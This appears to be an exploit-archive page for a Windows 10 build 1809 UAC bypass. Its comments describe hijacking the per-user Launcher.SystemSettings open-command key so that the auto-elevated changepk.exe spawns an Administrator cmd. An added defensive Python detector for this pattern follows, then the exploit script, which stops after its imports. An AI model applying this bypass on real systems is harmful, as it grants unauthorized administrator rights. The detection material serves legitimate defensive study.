Microsoft Windows 10 build 1809 Local Privilege Escalation (UAC Bypass) Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2020-01-13 | Type: local | Platform: windows
This exploit / vulnerability, Microsoft Windows 10 build 1809 local privilege escalation (UAC bypass), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
# Exploit Title: Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)
# Author: Nassim Asrir
# Date: 2019-01-10
# Exploit Author: Nassim Asrir
# CVE: N/A
# Tested On: Windows 10 Pro 1809
# Vendor : https://www.microsoft.com
# Technical Details
# I discovered a Local Privilege Escalation in Windows 10 (UAC Bypass), via an auto-elevated process.
# The executable is changepk.exe. changepk is used to pass a new product key; you can also pass the key via the command line.
# By executing changepk.exe and tracing the process, we can see some RegOpenKey operations that lead to opening some keys that are not found in the registry (HKCU).
# In our case we can use "HKCU:\Software\Classes\Launcher.SystemSettings\Shell\Open\Command" to spawn our Administrator cmd or to bypass the mmc UAC.
# Exploit
# To exploit the vulnerability, you can use this Python code: execute it and you will get the Windows Activation; just click Yes and you will redirect the execution to cmd.exe.
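A defender's view of the behaviour described above, as an added example that is not part of the original exploit or its author's code: it flags a write under the per-user Launcher.SystemSettings open command that is followed shortly by a changepk.exe launch by the same user. The event field names, the 300-second window, the SID and the sample events are constructed assumptions, and the `HKU\<SID>_Classes` path form assumes Sysmon-style registry telemetry.

```python
import re

# Per-user key named on the page. HKCU\Software\Classes appears in registry
# telemetry as HKU\<SID>_Classes or HKU\<SID>\Software\Classes (assumed format).
HIJACK_KEY = re.compile(
    r"^HKU\\S-1-5-21-[\d-]+(?:_Classes|\\Software\\Classes)"
    r"\\Launcher\.SystemSettings\\Shell\\Open\\Command(?:\\|$)",
    re.IGNORECASE,
)
WINDOW_SECONDS = 300  # assumed correlation window, tune per environment


def find_changepk_hijack(events):
    """Flag a write under the Launcher.SystemSettings open command that is
    followed within WINDOW_SECONDS by a changepk.exe launch by the same user."""
    alerts, pending = [], {}  # pending: user -> most recent matching write
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["type"] == "registry_set" and HIJACK_KEY.match(ev["target"]):
            pending[ev["user"]] = ev
        elif (ev["type"] == "process_create"
              and ev["image"].lower().endswith("\\changepk.exe")):
            write = pending.pop(ev["user"], None)
            if write and ev["time"] - write["time"] <= WINDOW_SECONDS:
                alerts.append({"user": ev["user"],
                               "command": write["details"],
                               "delay": ev["time"] - write["time"]})
    return alerts


def _key(rid, tail):  # constructed SID, not taken from a real host
    return "HKU\\S-1-5-21-1111111111-2222222222-3333333333-%d_Classes\\%s" % (rid, tail)


# Constructed sample events (hypothetical field names, times in seconds).
SAMPLE_EVENTS = [
    {"time": 100, "type": "registry_set", "user": "LAB\\alice",
     "target": _key(1001, "Launcher.SystemSettings\\Shell\\Open\\Command\\(Default)"),
     "details": "C:\\Windows\\System32\\cmd.exe"},
    {"time": 130, "type": "process_create", "user": "LAB\\alice",
     "image": "C:\\Windows\\System32\\changepk.exe"},
    # Unrelated class write, then a changepk.exe launch with no hijack: no alert.
    {"time": 200, "type": "registry_set", "user": "LAB\\bob",
     "target": _key(1002, ".txt\\OpenWithList"), "details": "notepad.exe"},
    {"time": 260, "type": "process_create", "user": "LAB\\bob",
     "image": "C:\\Windows\\System32\\changepk.exe"},
]

if __name__ == "__main__":
    for alert in find_changepk_hijack(SAMPLE_EVENTS):
        print("ALERT", alert)
```

Because changepk.exe is auto-elevated, the registry write by a medium-integrity process is the earlier and more reliable signal; the process launch only confirms that the key was consumed.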
# -*- coding: utf-8 -*-
import os
import sys
import ctypes
import _winreg
import time